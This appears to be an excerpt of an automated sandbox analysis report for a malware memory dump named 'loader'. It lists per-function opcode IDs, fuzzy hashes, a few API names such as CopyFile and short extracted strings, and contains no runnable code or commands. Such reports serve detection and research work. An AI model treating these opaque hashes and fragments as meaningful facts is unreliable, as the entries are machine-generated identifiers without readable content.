                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -#
                                                                                      • API String ID: 0-935786782
                                                                                      • Opcode ID: 57cdcfad62d8dcf5a54ed80bde65bd6b7db0f3481728dc9baa5a5fe50a26a015
                                                                                      • Instruction ID: 2c3e44ce678fea81b99f12b1231c353f8d9307234c328d649e85df0523243cf4
                                                                                      • Opcode Fuzzy Hash: 57cdcfad62d8dcf5a54ed80bde65bd6b7db0f3481728dc9baa5a5fe50a26a015
                                                                                      • Instruction Fuzzy Hash: 18B13872B143209BD7109B24DC4263BB3E2EFD5354F5A892EF8C597381E778D8018796
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "
                                                                                      • API String ID: 0-123907689
                                                                                      • Opcode ID: 1db96fd4edcb4f5ef483c943680c140f54b21b7c01618858d0b822cc87b217d8
                                                                                      • Instruction ID: 3c8ddbb5a4497eba4258620c61f30ed3f2e79d57b652312d84cfeaf09241064e
                                                                                      • Opcode Fuzzy Hash: 1db96fd4edcb4f5ef483c943680c140f54b21b7c01618858d0b822cc87b217d8
                                                                                      • Instruction Fuzzy Hash: 03D10472B083219FD714DE25E48076BB7EAAF84314F58852EE89987382D738DD05C7D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: YRTP
                                                                                      • API String ID: 0-1304800334
                                                                                      • Opcode ID: 37146779f974c5e4383577f1573f5a7964a2096c26cd72f15ec53405611c2017
                                                                                      • Instruction ID: e0d70bf8a4c85a1cc3b2b9bcf48ea2e6ebec0f282fbbd6f7f7be71b33c563769
                                                                                      • Opcode Fuzzy Hash: 37146779f974c5e4383577f1573f5a7964a2096c26cd72f15ec53405611c2017
                                                                                      • Instruction Fuzzy Hash: 28C1F3B5A08351CBD704DF24A88126FB7E1AF96304F48487EE8C597382D739DD06CB9A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: 5|iL
                                                                                      • API String ID: 2994545307-1880071150
                                                                                      • Opcode ID: 0eeac4bc6b849e691d6aea8eb7dc24639a941a928a1aae8f3fd6c918f8f4336b
                                                                                      • Instruction ID: b307da7332e1aea47b869681b2aa0c624a19412ca3f0e91de31c18a0a06cb140
                                                                                      • Opcode Fuzzy Hash: 0eeac4bc6b849e691d6aea8eb7dc24639a941a928a1aae8f3fd6c918f8f4336b
                                                                                      • Instruction Fuzzy Hash: FD510A31A057109BD7149F2889C076BBBE1EBDA328F29E92ED494AB391D735DC0187C9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: MC
                                                                                      • API String ID: 0-293102370
                                                                                      • Opcode ID: 8238e09845d867c980d162dfaab0320e16ed7e9f624b8334ab8c67f105616e5f
                                                                                      • Instruction ID: a25a417462b9c78435542dba646035a18039d8055a2ca9f65fddfbaa91818409
                                                                                      • Opcode Fuzzy Hash: 8238e09845d867c980d162dfaab0320e16ed7e9f624b8334ab8c67f105616e5f
                                                                                      • Instruction Fuzzy Hash: 5F51C2B45083428BD7309F25C8917ABB7E1EF96314F04892DE4D98B391EB784845DB56
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: MC
                                                                                      • API String ID: 0-293102370
                                                                                      • Opcode ID: d25f0197a41c43f8931ebce1b370a0e80337a0e0b67d1b6f44e6107bbb2b59b1
                                                                                      • Instruction ID: 14ab7e0cd549b778cc042c348287a68b36094c33c3afb9c5d2be5201875a4a2e
                                                                                      • Opcode Fuzzy Hash: d25f0197a41c43f8931ebce1b370a0e80337a0e0b67d1b6f44e6107bbb2b59b1
                                                                                      • Instruction Fuzzy Hash: AA41C0B45083828BC730CF25C8A17ABBBE0EF96314F04896DE4D98B391E7784845DB96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T_i
                                                                                      • API String ID: 0-1235689341
                                                                                      • Opcode ID: 6e765f3704368f8deea9af135ba808d526ca4bbf24db71a6e0838efec4914b64
                                                                                      • Instruction ID: 378b5af8ae39c35a582840a91c257951ae35a79d03d3a946bc2fd5657e82b003
                                                                                      • Opcode Fuzzy Hash: 6e765f3704368f8deea9af135ba808d526ca4bbf24db71a6e0838efec4914b64
                                                                                      • Instruction Fuzzy Hash: 803168249487D14AE72A8B3A89957B37FD0AF23304F48499DD4D3CBA86C62CA047CB54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 04353af72748e7ac624a8d34be0c2309fa446edcbb238c0b96f17f33128a9477
                                                                                      • Instruction ID: 694fab51773e91c51fbde4d2077d6e4800607ee9772c1e2aaea403a5b6f23483
                                                                                      • Opcode Fuzzy Hash: 04353af72748e7ac624a8d34be0c2309fa446edcbb238c0b96f17f33128a9477
                                                                                      • Instruction Fuzzy Hash: 5452C2315087128BC725DF18D94026BB3E1FFD4315F198A2ED8D6A7385DB39A852CB8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb0c690ada777e8c0e8d086eb475aae4cd715664ab3c5e4cc27ad5e3ab0d34d2
                                                                                      • Instruction ID: efa07c97eb2f05d488149aebac8a5f3049800253d81770cb57b144f776f23d42
                                                                                      • Opcode Fuzzy Hash: fb0c690ada777e8c0e8d086eb475aae4cd715664ab3c5e4cc27ad5e3ab0d34d2
                                                                                      • Instruction Fuzzy Hash: 64221E36648351CFD308DF68D89122BBBE2EBCA314F1A897ED58587391D734E905CB86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10112825edd7caaa223a5beedac1f2a692e90050a9ab64a9f6e138e487d5bad3
                                                                                      • Instruction ID: 6d31f81a46ba80712efc3d210bc5e1e118f04b1fab1c6456a3b2380dff49e649
                                                                                      • Opcode Fuzzy Hash: 10112825edd7caaa223a5beedac1f2a692e90050a9ab64a9f6e138e487d5bad3
                                                                                      • Instruction Fuzzy Hash: 16121F3AA48351CFD304CF68E89062BBBE2EBCA314F1A887ED58587351D734D805CB86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4afb0cea9134bcce1956427e6e8870436d1a24d38342c42d0cdd9289eed5eb6e
                                                                                      • Instruction ID: 995b0fcad772d26c05e82f41b685f9e79218e23d97ad402db9a1a81d99e1c916
                                                                                      • Opcode Fuzzy Hash: 4afb0cea9134bcce1956427e6e8870436d1a24d38342c42d0cdd9289eed5eb6e
                                                                                      • Instruction Fuzzy Hash: 86514374A00214CBDF10CFA9D895BBF77B0FB89314F24512DE502AB280D7799912CBA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef4350ac2ee95b7f445e7d190223230116b7fc5834c6357326ff43fcbdeb8a41
                                                                                      • Instruction ID: dc68298639863375d8a69b03068ed96139567a1060d4ea1d2010cc1b273e063b
                                                                                      • Opcode Fuzzy Hash: ef4350ac2ee95b7f445e7d190223230116b7fc5834c6357326ff43fcbdeb8a41
                                                                                      • Instruction Fuzzy Hash: 0651E0B640C311DAD314CF24C89162BB7F1FF96758F149A2DE4D66B6A1E3358601CB8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f262f90c2557e889d833367d2ba8a61f6b079325025ae374dc454892215b80e3
                                                                                      • Instruction ID: 627a7781eaf0eebd24a0f5db20f5fa2b4623f7c8a7653c3bf1952db54e0ba335
                                                                                      • Opcode Fuzzy Hash: f262f90c2557e889d833367d2ba8a61f6b079325025ae374dc454892215b80e3
                                                                                      • Instruction Fuzzy Hash: CA41D475A042058BD724DE29C88092BB3E5AFC5354F05453EFC49A73E2EB39EC1187DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3933966bded42226f60e2e4d826cdb4a60970daf650ea496250865d66223d6eb
                                                                                      • Instruction ID: 984379aff65c77cb1c4e468844b7d0add845b8f60711f1ef9018c2d6cf5805a4
                                                                                      • Opcode Fuzzy Hash: 3933966bded42226f60e2e4d826cdb4a60970daf650ea496250865d66223d6eb
                                                                                      • Instruction Fuzzy Hash: E6412435A00210DBDB14CF69D894BAF77B4FF89314F24502DE442AB281C379A921CBAA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1495b98e3c98b8edf385ea0a2526577a1a758f1338a2bf73e321b5511b5b7cf2
                                                                                      • Instruction ID: e5b4877d518f213343407f8e37bd9d7f8fa9019b6a4d2af6567f8786c2d95e0b
                                                                                      • Opcode Fuzzy Hash: 1495b98e3c98b8edf385ea0a2526577a1a758f1338a2bf73e321b5511b5b7cf2
                                                                                      • Instruction Fuzzy Hash: 0931AC70A443006BEA109B15DC41B3BB799EF9931CF14693EFDC697392E236DC21826B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dec6b19b4bdfe03bf2a4821e20df348eaea1839ac3dde95f5b9d8b4e6d1a321d
                                                                                      • Instruction ID: e998449b165f144de5819ca8393925d7848d1260226f80129637cd5bb292c332
                                                                                      • Opcode Fuzzy Hash: dec6b19b4bdfe03bf2a4821e20df348eaea1839ac3dde95f5b9d8b4e6d1a321d
                                                                                      • Instruction Fuzzy Hash: 36312731A053018BD3008F69C8C471BFBE5EBDA714F19DA2EE494AB390D77988068795
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d671c34dbe3fd99df971de2804de5a1a4421a7843c82842a4f836c78a2f3d8c3
                                                                                      • Instruction ID: 25bf4f862b4ab7b9aa1af6db7e5d7075d7b13907e5742f4b85e2bda7a904bef1
                                                                                      • Opcode Fuzzy Hash: d671c34dbe3fd99df971de2804de5a1a4421a7843c82842a4f836c78a2f3d8c3
                                                                                      • Instruction Fuzzy Hash: 8D217572B14520DBD72C8F29A89163F7252FFE5314FEE512EC9421B221D2358C028ACE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab533a202631904a2b0ecbb8909b569798e35af81309a9dc177abd73a0c7ccdf
                                                                                      • Instruction ID: b4028c2de3ebb1fc325833494fc10b9bfc5f5ad2caf2cbe185d6f7e2f31fd1a3
                                                                                      • Opcode Fuzzy Hash: ab533a202631904a2b0ecbb8909b569798e35af81309a9dc177abd73a0c7ccdf
                                                                                      • Instruction Fuzzy Hash: 9931AC316083029BD7149E19C980937B7E2EFC4358F15897EE849A73D1D739EC52CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b5b5a928f14cd7a2b7e0d7031a48f4cd6eebc4ebc2a592346c34199ad68b5cae
                                                                                      • Instruction ID: 1d356f24bc63c67b5ee5e58e9ab271e8410a07bff29cc1434979da066cce1f96
                                                                                      • Opcode Fuzzy Hash: b5b5a928f14cd7a2b7e0d7031a48f4cd6eebc4ebc2a592346c34199ad68b5cae
                                                                                      • Instruction Fuzzy Hash: BA01BCF1B0071147DB20EE65A4C0B3FB2A86F85708F48143EE84967342DBB9EC44C6E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 267d7e588891ca6a21b9fc59a631ab30fa1fab02eb2ad26210c16acf5da04592
                                                                                      • Instruction ID: 5c5a70589de69a35e5971e882f09013b756b32b4fef578c958a218f1aba5ae1c
                                                                                      • Opcode Fuzzy Hash: 267d7e588891ca6a21b9fc59a631ab30fa1fab02eb2ad26210c16acf5da04592
                                                                                      • Instruction Fuzzy Hash: CF1190724183548BC3049F64DD9A31FBBE5FB85348F140A2DE1C09B281EBB895098B86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c106320bcc7394ae56af663a472c6a2f4a5d0f240ce890532d660d90108f5822
                                                                                      • Instruction ID: be29ae359cb874e0224cc408d0abf3d8363a1679f358c768933014b27f0718db
                                                                                      • Opcode Fuzzy Hash: c106320bcc7394ae56af663a472c6a2f4a5d0f240ce890532d660d90108f5822
                                                                                      • Instruction Fuzzy Hash: ABF0597E7052150BE310CEAAECC4A3BF7A5EBC6309B05003AE941E3380C4B1DC0282A8
                                                                                      APIs
                                                                                      • CopyFileW.KERNEL32(?,C98CCBB1,00000000), ref: 0042A886
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CopyFile
                                                                                      • String ID: gw$t|
                                                                                      • API String ID: 1304948518-641399299
                                                                                      • Opcode ID: 50b114c5f0f823fd9c0c3f8a5d4b1d0637cd9055717e2b51aa9480df90ab9860
                                                                                      • Instruction ID: 7dcbee20dc34693907193fc374d55090c6b8465b8f7e70e875d97ca907622016
                                                                                      • Opcode Fuzzy Hash: 50b114c5f0f823fd9c0c3f8a5d4b1d0637cd9055717e2b51aa9480df90ab9860
                                                                                      • Instruction Fuzzy Hash: 57118BB55183918FE3118F10C44468EBBE0AFD6708F184C9DF4C89B291E7388506CB97